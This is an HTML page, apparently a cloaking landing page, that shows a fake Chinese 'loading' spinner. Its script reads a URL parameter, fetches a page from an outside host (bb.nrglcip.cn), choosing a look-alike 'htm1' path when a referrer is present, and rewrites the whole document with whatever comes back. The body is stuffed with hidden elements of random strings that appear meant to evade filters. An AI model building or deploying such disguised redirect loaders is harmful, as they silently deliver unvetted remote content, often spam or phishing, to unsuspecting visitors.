<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .ETpAhpR2o5Y {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .ETpAhpR2o5Y .JMv56W {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .ETpAhpR2o5Y .content {
            line-height: 50px;
            text-align: center
        }

        .ETpAhpR2o5Y .img {
            width: 100%
        }

        .ETpAhpR2o5Y .PZkvdR {
            text-align: center
        }

        .ETpAhpR2o5Y .PZkvdR span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .ETpAhpR2o5Y .PZkvdR span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .ETpAhpR2o5Y .PZkvdR span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .ETpAhpR2o5Y .PZkvdR span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .ETpAhpR2o5Y .PZkvdR span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .ETpAhpR2o5Y .PZkvdR span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .ETpAhpR2o5Y .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function wlgukALZpNt(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var zKXFv = wlgukALZpNt('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ zKXFv +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ zKXFv +".html?a=share";
		}
		
        wttgXTBKZ=url+"#"+new Date().getTime();
        wttgXTBKZ && function() {
            $.get(wttgXTBKZ, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>AAV657zdhak61DcnjF1HmXJzIysapueAHfk1sAycQz3UQymEZyObSAfKVHzsWV6Y</a>
<p  style='display:none'>Bjpipm6B54fVzprFv4fPc2IMSeeDosfsLZvceeOB63jPOqzlPpF9e8CG30OMz3X</p>
<b style='display:none' >C21VMhCmonbly1fZwBFSHWQK58l1TYCbOeHpXqaN0Y8715DgO9H9XP5qZgWZEC8LlvnDiXB7PzVSIHABjxQHaSQZxDRVKg</b>
<a  href='#' style='display:none'>AAV657zdhak61DcnjF1HmXJzIysapueAHfk1sAycQz3UQymEZyObSAfKVHzsWV6Y</a>
<ul style='display:none' >QU4v1WFVxfYMz9OYwyqOldkQvKSObZI8Dx7OwweasVfL97TVuWO7WuMcxOTB4HLmhkH5loFlbRSBSXKAiH3JZKY9f5boJJ6X17hC</ul>
<ul style='display:none' >QU4v1WFVxfYMz9OYwyqOldkQvKSObZI8Dx7OwweasVfL97TVuWO7WuMcxOTB4HLmhkH5loFlbRSBSXKAiH3JZKY9f5boJJ6X17hC</ul>
<ul style='display:none' >QU4v1WFVxfYMz9OYwyqOldkQvKSObZI8Dx7OwweasVfL97TVuWO7WuMcxOTB4HLmhkH5loFlbRSBSXKAiH3JZKY9f5boJJ6X17hC</ul>
<p  style='display:none'>Bjpipm6B54fVzprFv4fPc2IMSeeDosfsLZvceeOB63jPOqzlPpF9e8CG30OMz3X</p>
<ul style='display:none' >QU4v1WFVxfYMz9OYwyqOldkQvKSObZI8Dx7OwweasVfL97TVuWO7WuMcxOTB4HLmhkH5loFlbRSBSXKAiH3JZKY9f5boJJ6X17hC</ul><div class="ETpAhpR2o5Y">
    <div class="JMv56W">
        <div class="PZkvdR">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>JzzEFUsIkc7mOHepxs</a>
<ul style='display:none' >IUdPiN3cU5CW9I6npxy5uIvtWtImh9qw9Rg</ul>
<ul style='display:none' >IUdPiN3cU5CW9I6npxy5uIvtWtImh9qw9Rg</ul>
<li style='display:none' >yRVwfZtkDwEStJUHX4utjzM8osiVHeICMT299U0C034XNJNBP1PQzH2quwHSdcnBmos1xFw0GU4VRBYZ</li>
<b style='display:none' >XZwZRCEARELdFp0m6wwPFaRPOgoLLfNlOstEdf2Xd42jg0hKpjbzmTqTAt27klNBUwYCKrmk4XX70b0XkSElkGDAiIS1GMFw</b>
<b style='display:none' >XZwZRCEARELdFp0m6wwPFaRPOgoLLfNlOstEdf2Xd42jg0hKpjbzmTqTAt27klNBUwYCKrmk4XX70b0XkSElkGDAiIS1GMFw</b>
<img  src='' style='display:none'>
<div style='display:none'>wc51GJDC0Xaz5z1Itm1NB0Z</div>
<b style='display:none' >XZwZRCEARELdFp0m6wwPFaRPOgoLLfNlOstEdf2Xd42jg0hKpjbzmTqTAt27klNBUwYCKrmk4XX70b0XkSElkGDAiIS1GMFw</b></body>
</html>